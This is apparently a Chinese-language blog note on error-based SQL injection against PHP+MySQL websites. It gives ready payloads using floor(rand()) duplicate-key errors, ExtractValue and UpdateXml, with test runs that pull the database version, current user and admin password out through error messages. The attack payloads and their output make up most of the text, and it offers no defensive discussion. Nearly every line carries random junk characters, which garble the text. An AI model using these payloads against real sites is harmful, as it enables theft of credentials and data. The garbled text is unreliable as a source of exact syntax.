放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
: J2 ]: K. y. \1 r9 K' O$ Q实际测试环境:
3 {1 X. m C5 @( T+ F& ~. m; E7 h7 {: D7 s
& @- x9 e8 j }7 Y; Emysql> show tables;
1 _ q2 m3 ?! _ r# _& J+----------------+
. Z2 u- A+ P. y+ G) h2 W8 q2 h1 @| Tables_in_test |
, `/ T+ R$ E9 Z/ b4 s& I; O, o1 Q+----------------+* }# R: t3 h- o! F* r
| admin |, O# o: ]; I6 m+ L) a
| article |
0 w' P7 `+ l O+----------------+1 r% E3 z d! j
D- r5 H% j+ R
' e' b$ \9 z! I5 ?/ j: {( Y
! q) Q; W5 T Y4 a% m1 ^8 H: ymysql> describe admin;
% G M. I3 ^" h4 c' f- N( l( Q5 f5 D+-------+------------------+------+-----+---------+----------------+4 H& C+ f0 y0 {( R5 j
| Field | Type | Null | Key | Default | Extra |$ n9 w/ G) c% t/ S
+-------+------------------+------+-----+---------+----------------+
( K3 p. [. K8 H& r| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; }& x2 K/ v, m4 x1 v, Q8 J( t| user | varchar(50) | NO | | NULL | |
! o& {3 U/ u1 [2 |+ d- e| pass | varchar(50) | NO | | NULL | |( a* V, V1 ~% n. k6 L
+-------+------------------+------+-----+---------+----------------+! c6 J& `0 s9 n
! D& j$ @, E; q
. N c1 n9 Z) v- B1 ~: P7 V$ i( {
- u& d/ P ]5 X8 Z
mysql> describe article;! y2 ^0 @5 ^) f& e
+---------+------------------+------+-----+---------+----------------+' I* ^( y% [/ }% Q' s; ]
| Field | Type | Null | Key | Default | Extra |
5 W0 R8 |, {9 u1 W4 Q+---------+------------------+------+-----+---------+----------------+& j) I. F. ]6 Q; I: _
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
! \3 S2 }1 c* p$ d6 g- s( D! v| title | varchar(50) | NO | | NULL | |( h. m$ K$ e: m+ P
| content | varchar(50) | NO | | NULL | |& M5 ^) B+ |- H- a
+---------+------------------+------+-----+---------+----------------+$ D' D, n0 |" `* _; C$ Q
1、通过floor报错
8 V/ J$ m9 }9 d; Z0 T& I* |8 J可以通过如下一些利用代码$ s$ Y: Q7 w/ o$ v. i/ @2 X, S
! Y3 J1 Y& b: P) ]7 ]+ H
8 B* Y. G2 i& W! k1 G2 Band select 1 from (select count(*),concat(version(),floor(rand(0)*2))x1 P* A! C( W6 ?4 P3 \6 c5 `+ n& Z
from information_schema.tables group by x)a);1 i- @; b6 ?0 L3 w, p" x U
$ q3 _& e' B* o. q' |% {. ]
, i6 B+ `0 [$ p3 W% D0 r0 l7 X5 ^
and (select count(*) from (select 1 union select null union select !1)x
! n# m4 o# C' T2 y/ Ogroup by concat((select table_name from information_schema.tables limit 1),( a6 U F" j$ A9 Q
floor(rand(0)*2)));- Z/ l/ X7 [1 S ?$ X
举例如下:
( S, r/ C: F0 m; \6 G3 j1 o首先进行正常查询:
- E# e; x1 {& F) M/ z: l7 q
, q& `# F9 B& y* d0 ]mysql> select * from article where id = 1;
" N3 r' t2 K0 ^4 s- z! d. ^+----+-------+---------+- k; y% P) d4 {. h& [& h
| id | title | content |
# l$ A- |( f+ \1 }# c+ f5 N& S/ n+----+-------+---------+! X9 _2 x% \7 ~6 a l* O) x
| 1 | test | do it |8 g7 g3 C" {- r' E
+----+-------+---------+
3 a. @. n. \; B" C假如id输入存在注入的话,可以通过如下语句进行报错。
9 R" K# D6 q1 O$ H S$ ~/ o& V1 T( _# ` 2 \8 _3 d9 P5 q A5 ~9 t/ x4 |
( \1 D. F3 M D* o6 ~( p- O) kmysql> select * from article where id = 1 and (select 1 from- h6 j! f9 j6 g# t) y$ L/ l
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 U& o: ~6 @6 a% M# g8 s
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'; }0 K* q F" w0 I2 s3 d
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
2 ~! Q( q: c0 ]4 d' Q+ n' m& y2 E例如我们需要查询管理员用户名和密码:
9 v: q3 H7 @0 Q9 q" W' ]( M" TMethod1:
" U3 x. _& f4 B& d" V 2 R4 U7 X- K' c7 f0 l! o
; S# h0 A6 w' E, w% O5 |mysql> select * from article where id = 1 and (select 1 from; C& w4 ^8 I! F' E/ d
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
% y0 O ?5 R) @from information_schema.tables group by x)a);
3 o5 `! f1 s6 W/ O4 nERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 G1 W) ]7 `6 v) ^Method2:" N3 s% W& q" U' q
! w, q$ U3 g5 X3 C
$ e1 j& }4 u2 P2 j% m
mysql> select * from article where id = 1 and (select count(*)) x% x, y0 ~6 |5 k" ^% R. d
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
" k$ N3 ^8 ?) _5 A0 ?) B2 }1 r& e" Hfloor(rand(0)*2)));8 U; Z, r8 G& K0 ~/ ^: D
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 ~+ m% L. y: T' Q1 f$ R: ~2、ExtractValue
1 U; i6 b3 t& L G' R: F测试语句如下; }' J) q7 l" }% h# C! ^* [6 h
' k% S, Y* s5 B3 }
- z+ i- v# M/ A2 O, x
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
2 y/ N# c) Q( w# T实际测试过程
& V2 b+ z' ]! b5 B3 ?
, V% f8 L1 o3 a- B# _( W # ? J" c6 s5 h" o. g
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,* {" C+ |: x" S, t! \
(select pass from admin limit 1)));--
! C4 i) ^$ d4 z- KERROR 1105 (HY000): XPATH syntax error: '\admin888': v5 r' A" {! [0 T
3、UpdateXml) P: V0 t7 M: k
测试语句
1 a' W6 g6 w% j+ ` , w6 y' h" ?! t |/ H; R4 c
3 j4 l% M0 u% \9 v% t" t2 y) O6 s
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))( r0 A R7 w* P$ ]
实际测试过程
`" o- y3 g0 I- L% J0 y) H* { - U1 V6 k4 s- L
" D- x2 h- p# F6 O5 j; G/ o- I
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
J3 n- W; w$ g6 d1 D(select pass from admin limit 1),0x5e24),1));7 \) \. @9 R* P0 ~, U, o
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'4 u9 ~, A, ^1 |. u* h& q4 F
All, thanks foreign guys.
$ ]' J* T; y8 |& A
/ U5 q, h- n, \* q
" c4 C$ s- B# Z) ?0 R& \ ~ |